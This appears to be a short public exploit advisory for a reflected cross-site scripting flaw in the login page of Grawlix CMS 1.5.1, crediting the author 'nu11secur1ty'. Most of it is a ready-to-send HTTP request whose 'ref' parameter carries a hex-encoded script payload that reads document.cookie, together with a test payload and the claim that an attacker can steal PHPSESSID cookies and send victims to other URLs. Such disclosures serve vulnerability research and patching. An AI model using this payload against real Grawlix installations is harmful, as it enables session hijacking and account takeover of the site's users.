## Title: grawlix-1.5.1 XSS-Reflected
## Author: nu11secur1ty
## Date: 08/29/2023
## Vendor: https://getgrawlix.com/
## Software:
## Reference: https://portswigger.net/web-security/cross-site-scripting

## Description:
The value of the ref request parameter is copied into the value of an
HTML tag attribute which is encapsulated in double quotation marks.
The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submitted
in the ref parameter. This input was echoed unmodified in the
application's response. The attacker can steal PHPSESSID cookie and
can trick the victim into visiting his or some other dangerous URL
address.

STATUS: HIGH-Vulnerability

[+]Exploit:
```POST
GET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=Login
HTTP/1.1
Host: localhost
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2
Connection: close

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)

## Time spend:
00:27:00